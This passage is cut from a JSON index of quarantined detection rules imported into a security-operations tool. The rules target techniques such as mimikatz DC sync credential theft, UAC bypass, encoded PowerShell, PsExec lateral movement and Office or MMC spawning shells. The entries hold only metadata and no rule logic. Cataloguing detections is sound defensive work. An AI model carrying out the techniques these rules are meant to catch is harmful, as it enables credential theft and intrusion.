"rules/_deprecated/malware/wannacry_killswitch_domain.yaral" } }, { "id": "chronicle-detection-rules-malware-zeppelin-registry", "type": "detection", "name": "malware_zeppelin_registry", "description": "malware_zeppelin_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/malware-zeppelin-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "malware_zeppelin_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/malware/zeppelin_registry.yaral" } }, { "id": "chronicle-detection-rules-mavinject-process-injection", "type": "detection", "name": "mavinject_process_injection", "description": "mavinject_process_injection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mavinject-process-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mavinject_process_injection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mavinject_process_injection.yaral" } }, { "id": "chronicle-detection-rules-metasploit-framework-user-agents-proxy", "type": "detection", "name": "metasploit_framework_user_agents_proxy", "description": "metasploit_framework_user_agents_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/metasploit-framework-user-agents-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "metasploit_framework_user_agents_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/metasploit_framework_user_agents__proxy.yaral" } }, { "id": "chronicle-detection-rules-microsoft-binary-github-communication", "type": "detection", "name": "microsoft_binary_github_communication", "description": "microsoft_binary_github_communication", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-binary-github-communication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_binary_github_communication", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/microsoft_binary_github_communication.yaral" } }, { "id": "chronicle-detection-rules-microsoft-binary-suspicious-communication-endpoint", "type": "detection", "name": "microsoft_binary_suspicious_communication_endpoint", "description": "microsoft_binary_suspicious_communication_endpoint", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-binary-suspicious-communication-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_binary_suspicious_communication_endpoint", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/microsoft_binary_suspicious_communication_endpoint.yaral" } }, { "id": "chronicle-detection-rules-microsoft-office-product-spawning-windows-shell", "type": "detection", "name": "microsoft_office_product_spawning_windows_shell", "description": "microsoft_office_product_spawning_windows_shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-office-product-spawning-windows-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_office_product_spawning_windows_shell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/microsoft_office_product_spawning_windows_shell.yaral" } }, { "id": "chronicle-detection-rules-microsoft-teams-phishing-email", "type": "detection", "name": "microsoft_teams_phishing_email", "description": "microsoft_teams_phishing_email", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-teams-phishing-email.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_teams_phishing_email", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/microsoft_teams_phishing_email.yaral" } }, { "id": "chronicle-detection-rules-microsoft-workflow-compiler", "type": "detection", "name": "microsoft_workflow_compiler", "description": "microsoft_workflow_compiler", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/microsoft-workflow-compiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "microsoft_workflow_compiler", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/microsoft_workflow_compiler.yaral" } }, { "id": "chronicle-detection-rules-mimikatz-dc-sync", "type": "detection", "name": "mimikatz_dc_sync", "description": "mimikatz_dc_sync", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mimikatz-dc-sync.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mimikatz_dc_sync", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/mimikatz_dc_sync.yaral" } }, { "id": "chronicle-detection-rules-mimikatz-through-windows-remote-management", "type": "detection", "name": "mimikatz_through_windows_remote_management", "description": "mimikatz_through_windows_remote_management", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mimikatz-through-windows-remote-management.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mimikatz_through_windows_remote_management", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/mimikatz_through_windows_remote_management.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share", "description": "mitre_attack_T1021_002_windows_admin_share", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1021_002_windows_admin_share.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-basic", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_basic", "description": "mitre_attack_T1021_002_windows_admin_share_basic", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-basic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_basic", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_basic.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-with-asset-entity", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_with_asset_entity", "description": "mitre_attack_T1021_002_windows_admin_share_with_asset_entity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-with-asset-entity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_with_asset_entity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_with_asset_entity.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-with-user-enrichment", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_with_user_enrichment", "description": "mitre_attack_T1021_002_windows_admin_share_with_user_enrichment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-with-user-enrichment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_with_user_enrichment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_with_user_enrichment.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1021-002-windows-admin-share-with-user-entity", "type": "detection", "name": "mitre_attack_T1021_002_windows_admin_share_with_user_entity", "description": "mitre_attack_T1021_002_windows_admin_share_with_user_entity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1021-002-windows-admin-share-with-user-entity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1021_002_windows_admin_share_with_user_entity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1021_002_windows_admin_share_with_user_entity.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1037-001-windows-logon-script", "type": "detection", "name": "mitre_attack_T1037_001_windows_logon_script", "description": "mitre_attack_T1037_001_windows_logon_script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1037-001-windows-logon-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1037_001_windows_logon_script", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1037_001_windows_logon_script.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1053-005-windows-creation-of-scheduled-task", "type": "detection", "name": "mitre_attack_T1053_005_windows_creation_of_scheduled_task", "description": "mitre_attack_T1053_005_windows_creation_of_scheduled_task", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1053-005-windows-creation-of-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1053_005_windows_creation_of_scheduled_task", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1053_005_windows_creation_of_scheduled_task.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1140-encoded-powershell-command", "type": "detection", "name": "mitre_attack_T1140_encoded_powershell_command", "description": "mitre_attack_T1140_encoded_powershell_command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1140-encoded-powershell-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1140_encoded_powershell_command", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1140_encoded_powershell_command.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1218-005-windows-mshta-remove-usage", "type": "detection", "name": "mitre_attack_T1218_005_windows_mshta_remove_usage", "description": "mitre_attack_T1218_005_windows_mshta_remove_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1218-005-windows-mshta-remove-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1218_005_windows_mshta_remove_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1218_005_windows_mshta_remote_usage.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1543-001-macos-launch-agent", "type": "detection", "name": "mitre_attack_T1543_001_macos_launch_agent", "description": "mitre_attack_T1543_001_macos_launch_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1543-001-macos-launch-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1543_001_macos_launch_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1543_001_macos_launch_agent.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1543-004-macos-launch-daemon", "type": "detection", "name": "mitre_attack_T1543_004_macos_launch_daemon", "description": "mitre_attack_T1543_004_macos_launch_daemon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1543-004-macos-launch-daemon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1543_004_macos_launch_daemon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1543_004_macos_launch_daemon.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1546-001-windows-change-default-file-association", "type": "detection", "name": "mitre_attack_T1546_001_windows_change_default_file_association", "description": "mitre_attack_T1546_001_windows_change_default_file_association", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1546-001-windows-change-default-file-association.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1546_001_windows_change_default_file_association", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1546_001_windows_change_default_file_association.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1547-001-windows-registry-run-keys-startup-folder", "type": "detection", "name": "mitre_attack_T1547_001_windows_registry_run_keys_startup_folder", "description": "mitre_attack_T1547_001_windows_registry_run_keys_startup_folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1547-001-windows-registry-run-keys-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1547_001_windows_registry_run_keys_startup_folder", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1547_001_windows_registry_run_keys_startup_folder.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1548-002-windows-uac-bypass", "type": "detection", "name": "mitre_attack_T1548_002_windows_uac_bypass", "description": "mitre_attack_T1548_002_windows_uac_bypass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1548-002-windows-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1548_002_windows_uac_bypass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1548_002_windows_uac_bypass.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1564-001-macos-hidden-files-and-directories", "type": "detection", "name": "mitre_attack_T1564_001_macos_hidden_files_and_directories", "description": "mitre_attack_T1564_001_macos_hidden_files_and_directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1564-001-macos-hidden-files-and-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1564_001_macos_hidden_files_and_directories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1564_001_macos_hidden_files_and_directories.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1564-001-windows-hidden-files", "type": "detection", "name": "mitre_attack_T1564_001_windows_hidden_files", "description": "mitre_attack_T1564_001_windows_hidden_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1564-001-windows-hidden-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1564_001_windows_hidden_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1564_001_windows_hidden_files.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1564-001-windows-system-files", "type": "detection", "name": "mitre_attack_T1564_001_windows_system_files", "description": "mitre_attack_T1564_001_windows_system_files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1564-001-windows-system-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1564_001_windows_system_files", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/mitre_attack/T1564_001_windows_system_files.yaral" } }, { "id": "chronicle-detection-rules-mitre-attack-t1570-suspicious-command-psexec", "type": "detection", "name": "mitre_attack_T1570_suspicious_command_psexec", "description": "mitre_attack_T1570_suspicious_command_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mitre-attack-t1570-suspicious-command-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mitre_attack_T1570_suspicious_command_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/mitre_attack_T1570_suspicious_command_psexec.yaral" } }, { "id": "chronicle-detection-rules-mmc-spawning-windows-shell", "type": "detection", "name": "mmc_spawning_windows_shell", "description": "mmc_spawning_windows_shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mmc-spawning-windows-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mmc_spawning_windows_shell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mmc_spawning_windows_shell.yaral" } }, { "id": "chronicle-detection-rules-mmc20-lateral-movement", "type": "detection", "name": "mmc20_lateral_movement", "description": "mmc20_lateral_movement", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/mmc20-lateral-movement.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "mmc20_lateral_movement", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/mmc20_lateral_movement.yaral" } }, { "id": "chronicle-detection-rules-modification-of-windows-defender-service-settings-sysmon", "type": "detection", "name": "modification_of_windows_defender_service_settings_sysmon", "description": "modification_of_windows_defender_service_settings_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/modification-of-windows-defender-service-settings-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "modification_of_windows_defender_service_settings_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/modification_of_windows_defender_service_settings__sysmon.yaral" } }, { "id": "chronicle-detection-rules-modify-user-shell-folders-startup-value", "type": "detection", "name": "modify_user_shell_folders_startup_value", "description": "modify_user_shell_folders_startup_value", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/modify-user-shell-folders-startup-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "modify_user_shell_folders_startup_value", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/modify_user_shell_folders_startup_value.yaral" } }, { "id": "chronicle-detection-rules-monero-mining-detector", "type": "detection", "name": "monero_mining_detector", "description": "monero_mining_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 